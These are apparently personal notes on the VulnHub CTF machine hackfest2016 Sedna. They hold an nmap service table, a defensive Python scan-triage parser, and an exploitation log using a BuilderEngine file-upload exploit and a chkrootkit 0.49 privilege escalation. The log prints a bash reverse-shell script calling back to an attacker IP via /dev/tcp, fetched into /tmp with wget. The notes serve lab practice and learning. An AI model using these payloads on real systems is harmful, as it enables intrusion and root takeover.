
32 VM hackfest2016: Sedna

Walkthru:

A. https://mendidsiren63.blogspot.com/2017/05/vulnhub-hackfest2016sedna-walkthrough.html [PUT method returns 403 Forbidden, POSTER plugin renames uploaded files, exploit.html used to POST a file via the BuilderEngine 3.5.0 Arbitrary File Upload vulnerability, reverse shell with netcat or /dev/tcp, exploit 33899]

B. http://www.waywardpaladin.com/index.php?op=ViewArticle&articleId=3&blogId=1 [command-line reverse shell, firefart or exploit 40839, but I am getting an error upon compilation]

C. https://medium.com/@3wem/hackfest2016-sedna-ctf-de95f2ab0b4f [metasploit]

D. https://www.n00py.io/2017/03/vulnhub-walkthrough-hackfest2016-sedna/ [dirtycow]

Notes:

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
53/tcp    open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp   open  pop3        Dovecot pop3d
111/tcp   open  rpcbind     2-4 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
995/tcp   open  ssl/pop3    Dovecot pop3d
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
54985/tcp open  unknown
MAC Address: 08:00:27:29:F0:BD (Oracle VirtualBox virtual NIC)

dirb and nikto on ports 80 and 8080 found some interesting folders/files and Java Server Pages (JSP); some of them returned 403 Forbidden. The JSP/Coyote side shows many pages but nothing significant.
Some vulns but nothing worked. Ran smb commands but nothing so far. robots.txt also didn't show anything, and the PUT method likewise returned 403 Forbidden. Tried hydra against SMB and SSH for user "victor" but nothing.

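Added example (not from the original notes or any of the walkthroughs cited): a small Python parser for the Nmap service table above that turns each row into a defender's triage item. The embedded scan text is reconstructed from the notes, and the triage rules are my own assumptions.

```python
import re

# Constructed from the Nmap service table in the notes above, not a live scan.
NMAP_OUTPUT = """\
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
53/tcp    open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
110/tcp   open  pop3        Dovecot pop3d
111/tcp   open  rpcbind     2-4 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
995/tcp   open  ssl/pop3    Dovecot pop3d
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
54985/tcp open  unknown
MAC Address: 08:00:27:29:F0:BD (Oracle VirtualBox virtual NIC)
"""

# One service row: "<port>/<proto> <state> <service> [<version ...>]"
ROW_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Assumed triage rules: services that send credentials in the clear unless
# STARTTLS is enforced, and services that should never face an untrusted network.
PLAINTEXT_AUTH = {"pop3", "imap", "ftp", "telnet"}
LAN_ONLY = {"netbios-ssn", "rpcbind"}


def parse_nmap(text):
    # Header, MAC-address and blank lines do not match ROW_RE and are skipped.
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        rows.append({"port": int(port), "proto": proto, "state": state,
                     "service": service, "version": (version or "").strip()})
    return rows


def triage(rows):
    # Map each open port to the defender's first concern, sorted by port number.
    findings = []
    for r in rows:
        if r["state"] != "open":
            continue
        if r["service"] in PLAINTEXT_AUTH:
            findings.append((r["port"], "plaintext mailbox authentication; enforce TLS or close"))
        elif r["service"] in LAN_ONLY:
            findings.append((r["port"], "SMB/RPC exposed; restrict to trusted hosts"))
        elif r["service"] == "unknown":
            findings.append((r["port"], "unidentified listener; find the owning process"))
    return sorted(findings)
```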
Used https://www.exploit-db.com/exploits/40390/ to upload an arbitrary file. Tried to upload a file using the POSTER plugin, but it would rename the file and strip the PHP extension. The exploit also includes HTML code that can be used to upload a reverse shell file via a POST request.

$ uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
$ pwd
/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ls /home

Tried many exploits for privilege escalation but none of them worked. I decided to do more enumeration and found out that chkrootkit is installed on the machine; to our luck, version 0.49 is installed. This was found by a privilege escalation enumeration script.

Searching on searchsploit, we found an exploit for chkrootkit version 0.49. Per the vulnerability, chkrootkit will execute files with root privileges. We will now create a bash script for a reverse shell and wget it into the "tmp" folder; 192.168.213.149 is Kali in this case:

#!/bin/bash
bash -i >& /dev/tcp/192.168.213.149/445 0>&1

Once the script is ready, we wget it into the "tmp" directory and make it executable.

Now we start the listener on port 445 on our attacker machine and wait for the file to execute and send back the reverse shell, which happened after 5-15 minutes. I could run it manually, but that would only give me www-data access.

